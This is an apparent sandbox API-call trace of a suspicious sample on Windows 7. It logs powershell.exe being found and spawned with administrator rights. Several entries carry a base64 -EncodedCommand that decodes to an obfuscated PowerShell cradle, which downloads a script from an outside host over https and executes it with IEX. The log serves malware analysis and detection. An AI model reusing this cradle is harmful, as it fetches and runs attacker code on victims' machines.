	[0356.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.660] SetErrorMode (uMode=0x1) returned 0x1
	[0356.660] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.660] SetErrorMode (uMode=0x1) returned 0x1
	[0356.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.661] SetErrorMode (uMode=0x1) returned 0x1
	[0356.661] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.661] SetErrorMode (uMode=0x1) returned 0x1
	[0356.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.661] SetErrorMode (uMode=0x1) returned 0x1
	[0356.661] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.662] SetErrorMode (uMode=0x1) returned 0x1
	[0356.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.662] SetErrorMode (uMode=0x1) returned 0x1
	[0356.662] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.662] SetErrorMode (uMode=0x1) returned 0x1
	[0356.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.662] SetErrorMode (uMode=0x1) returned 0x1
	[0356.662] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.663] SetErrorMode (uMode=0x1) returned 0x1
	[0356.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.663] SetErrorMode (uMode=0x1) returned 0x1
	[0356.663] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.663] SetErrorMode (uMode=0x1) returned 0x1
	[0356.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.664] SetErrorMode (uMode=0x1) returned 0x1
	[0356.664] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.664] SetErrorMode (uMode=0x1) returned 0x1
	[0356.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.664] SetErrorMode (uMode=0x1) returned 0x1
	[0356.664] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.664] SetErrorMode (uMode=0x1) returned 0x1
	[0356.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0356.665] SetErrorMode (uMode=0x1) returned 0x1
	[0356.665] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.665] SetErrorMode (uMode=0x1) returned 0x1
	[0356.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.665] SetErrorMode (uMode=0x1) returned 0x1
	[0356.665] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.666] SetErrorMode (uMode=0x1) returned 0x1
	[0356.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.666] SetErrorMode (uMode=0x1) returned 0x1
	[0356.666] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.666] SetErrorMode (uMode=0x1) returned 0x1
	[0356.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.667] SetErrorMode (uMode=0x1) returned 0x1
	[0356.667] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.667] SetErrorMode (uMode=0x1) returned 0x1
	[0356.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.667] SetErrorMode (uMode=0x1) returned 0x1
	[0356.668] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0356.668] SetErrorMode (uMode=0x1) returned 0x1
	[0356.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6cdb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0356.668] SetErrorMode (uMode=0x1) returned 0x1
	[0356.668] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6cdd00 | out: lpFindFileData=0x1c6cdd00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x37cfa0
	[0356.669] FindNextFileW (in: hFindFile=0x37cfa0, lpFindFileData=0x1c6cdd10 | out: lpFindFileData=0x1c6cdd10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0356.669] FindClose (in: hFindFile=0x37cfa0 | out: hFindFile=0x37cfa0) returned 1
	[0356.669] SetErrorMode (uMode=0x1) returned 0x1
	[0356.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0356.670] SetErrorMode (uMode=0x1) returned 0x1
	[0356.670] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6ce030 | out: lpFileInformation=0x1c6ce030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0356.671] SetErrorMode (uMode=0x1) returned 0x1
	[0356.672] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.672] CoTaskMemFree (pv=0x34f1b0) 
	[0356.673] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.673] CoTaskMemFree (pv=0x34f1b0) 
	[0356.676] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.677] CoTaskMemFree (pv=0x34f1b0) 
	[0356.687] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.687] CoTaskMemFree (pv=0x34f1b0) 
	[0356.841] CoTaskMemAlloc (cb=0x3b) returned 0x364cc0
	[0356.841] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ce218, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ce218) returned 0x4550
	[0356.850] CoTaskMemFree (pv=0x364cc0) 
	[0356.853] GetConsoleWindow () returned 0x20212
	[0356.860] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.860] CoTaskMemFree (pv=0x34f1b0) 
	[0356.861] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.861] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0356.861] CoTaskMemFree (pv=0x34f1b0) 
	[0356.867] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0356.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0356.867] CoTaskMemFree (pv=0x34f1b0) 
	[0356.892] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c6ce260 | out: pNumArgs=0x1c6ce260) returned 0x1b7c8be0*=""
	[0356.893] lstrlenW (lpString="-EncodedCommand") returned 15
	[0356.894] CoTaskMemAlloc (cb=0x22) returned 0x1b7c1160
	[0356.894] RtlMoveMemory (in: Destination=0x1b7c1160, Source=0x1b7c8c02, Length=0x20 | out: Destination=0x1b7c1160) 
	[0356.894] CoTaskMemFree (pv=0x1b7c1160) 
	[0356.894] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0356.894] CoTaskMemAlloc (cb=0x2f4) returned 0x1b7c8f20
	[0356.894] RtlMoveMemory (in: Destination=0x1b7c8f20, Source=0x1b7c8c22, Length=0x2f2 | out: Destination=0x1b7c8f20) 
	[0356.894] CoTaskMemFree (pv=0x1b7c8f20) 
	[0356.895] LocalFree (hMem=0x1b7c8be0) returned 0x0
	[0356.896] CoTaskMemAlloc (cb=0x804) returned 0x1b7c8be0
	[0356.896] GetConsoleTitleW (in: lpConsoleTitle=0x1b7c8be0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0357.038] CoTaskMemFree (pv=0x1b7c8be0) 
	[0357.047] CoTaskMemAlloc (cb=0x38e) returned 0x1b7c8be0
	[0357.047] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6ce1c0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f6d108 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f6d108*(hProcess=0x374, hThread=0x370, dwProcessId=0x520, dwThreadId=0xa08)) returned 1
	[0357.051] CoTaskMemFree (pv=0x1b7c8be0) 
	[0357.052] CloseHandle (hObject=0x370) returned 1
	[0357.052] CoTaskMemAlloc (cb=0x3b) returned 0x364cc0
	[0357.052] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ce268, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ce268) returned 0x4550
	[0357.052] CoTaskMemFree (pv=0x364cc0) 
	[0357.055] GetCurrentProcess () returned 0xffffffffffffffff
	[0357.055] GetCurrentProcess () returned 0xffffffffffffffff
	[0357.056] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x374, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ce348, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ce348*=0x370) returned 1

Process:
	id = "22"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2e03c000"
	os_pid = "0x4fc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 122
	os_tid = 0xaac

	[0308.246] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0310.544] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0310.544] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0310.544] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0310.544] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0320.449] GetVersionExW (in: lpVersionInformation=0x1ce040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ce040*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0320.451] GetVersionExW (in: lpVersionInformation=0x1ce040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ce040*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0320.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0320.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
